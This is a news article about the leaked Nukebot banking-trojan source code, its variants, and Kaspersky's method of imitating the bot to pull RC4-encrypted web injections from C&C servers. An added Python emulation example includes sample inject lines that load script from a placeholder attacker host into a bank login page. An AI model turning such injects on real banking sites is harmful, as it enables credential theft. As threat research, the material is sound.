Source Code of Nukebot Leaked and Now We Have Modified Versions

It is a new ball game for us computer users. A new version of the Nukebot banking trojan has been confirmed in the wild after the malware's source code was leaked and picked up by other criminals. One new variant targets banks in France and the United States, while another group has adapted the source code to steal mail client and browser passwords.

The leak was disclosed last March by the malware's author, known as Gosya, who posted a link to the source code; it has since been downloaded across a number of black market forums.

Malware researchers have said there are a number of variants in the wild. Kaspersky Lab has confirmed this with compiled samples of Nukebot variants created since the leak, some of which appear to be test samples.

Some of the samples seem benign because they are test builds that do not point to a valid Command & Control address. Others, however, carry genuine addresses and appear to be operational.

Yunakovsky of Kaspersky Lab said that among the compiled samples, approximately five percent are being used in attacks. It is unclear whether these are several criminals using the leaked code independently or a single organized group.

Of those used in attacks, Yunakovsky said, an analysis of the web injections in the code indicates an interest in compromising banks in France and the U.S.

Some of the test samples in Kaspersky Lab's possession carry plain-text strings, so researchers were able to extract command and control addresses and other data used in the analysis directly from the malware. The operational versions of Nukebot, however, have their strings encrypted, requiring researchers to first extract the keys in order to recover the string values, Yunakovsky said.

“In order to trigger web injections, we had to imitate interaction with C&C servers. The C&C addresses can be obtained from the string initialization procedure,” Yunakovsky said. “When first contacting a C&C, the bot is sent an RC4 key which it uses to decrypt injections. We used this simple logic when implementing an imitation bot, and managed to collect web injections from a large number of servers.

“Initially, the majority of botnets only received test injects that were of no interest to us,” Yunakovsky said. “Later, however, we identified a number of NukeBot’s ‘combat versions.’”
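To make the imitation-bot idea concrete, the following Python is an added example written for this page; it is not Kaspersky's tool and contains no NukeBot code. It assumes a C&C that hands the bot an RC4 key on first contact and then serves an RC4-encrypted list of web injections, as the quote above describes. The message layout, the pipe-separated inject record format (target URL pattern, marker, payload) and every sample byte are constructed for this example and do not reproduce NukeBot's real wire format.

```python
"""
Added illustrative example, not NukeBot's code or Kaspersky's tool.

Models the "imitation bot" approach: contact the C&C, receive an RC4 key,
pull the encrypted injections, decrypt them and pull out the targeted sites.
The wire format and all sample data below are constructed assumptions.
"""
from dataclasses import dataclass


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). RC4 is symmetric: one function encrypts and decrypts."""
    if not key:
        raise ValueError("empty RC4 key")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


@dataclass
class WebInject:
    target: str   # URL pattern the inject applies to (hypothetical format)
    before: str   # page marker the payload is inserted in front of
    payload: str  # HTML/JS the trojan would splice into the page


def parse_injects(text: str) -> list[WebInject]:
    """Parse the constructed inject list: one 'target|marker|payload' record per line."""
    injects = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split("|", 2)
        if len(parts) != 3:
            # With a wrong key the plaintext is garbage; fail loudly instead of
            # silently returning nonsense "targets".
            raise ValueError(f"malformed inject record: {line!r}")
        injects.append(WebInject(*parts))
    return injects


class FakeC2:
    """Constructed stand-in for a C&C server: issues a key, then serves encrypted injects."""

    def __init__(self, key: bytes, inject_text: str):
        self.key = key
        self.blob = rc4(key, inject_text.encode("utf-8"))

    def hello(self) -> bytes:
        """First contact: the bot is handed the RC4 key (assumed behaviour)."""
        return self.key

    def get_injects(self) -> bytes:
        """Subsequent request: RC4-encrypted inject list."""
        return self.blob


def imitation_bot(c2: FakeC2) -> list[WebInject]:
    """Emulate the bot side of the exchange and return the decrypted injections."""
    key = c2.hello()
    blob = c2.get_injects()
    plaintext = rc4(key, blob).decode("utf-8")   # strict decode: wrong key -> error
    return parse_injects(plaintext)


def targeted_hosts(injects: list[WebInject]) -> list[str]:
    """Hostnames the injects are aimed at; this is what tells you which banks are targeted."""
    return sorted({i.target.split("/")[2] for i in injects})


# Constructed sample data; the domains are placeholders, not real targets.
SAMPLE_INJECTS = """# constructed inject list for the example
https://online.example-bank.fr/login*|</form>|<script src="https://cdn.evil.example/fr.js"></script>
https://www.example-bank.com/account*|<div id="balance">|<input type="hidden" name="pin">
"""

if __name__ == "__main__":
    c2 = FakeC2(b"constructed-key", SAMPLE_INJECTS)
    for host in targeted_hosts(imitation_bot(c2)):
        print(host)
```

Pointing `imitation_bot` at many servers with the same key-then-inject logic is the collection step the quote describes; the strict UTF-8 decode and the record check are there so that a wrong or rotated key surfaces as an error rather than as a bogus target list.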

Some modified versions of Nukebot have no web injections at all, Yunakovsky said. Those are instead spread via droppers; once unpacked, the malware downloads a number of password recovery utilities from a remote server under the attacker's control.

There is speculation about why the Nukebot source code was leaked. Late last March, IBM reported the leak and pointed out that Gosya, the malware's author, had lost the trust of the underground forums.

The code was initially put up for sale before it had been verified by forum administrators. Complications arose, leading to his ban, when the administrators found the same malware being sold on other forums under a different name, Micro Banking Trojan.

“When fraudsters realized that the same person was trying to vend under different names, they got even more suspicious that he was a ripper, misrepresenting or selling a product he does not possess,” Kessem and Kolmanovich of IBM wrote.

Nukebot appeared on the underground in December 2016. According to researchers from Arbor Networks, the banking malware not only arrived with web injects for a number of financial institutions but also included man-in-the-browser functionality. IBM said the malware was well designed to steal banking login data.

Which leads us to question… what will happen next and how will this affect us?
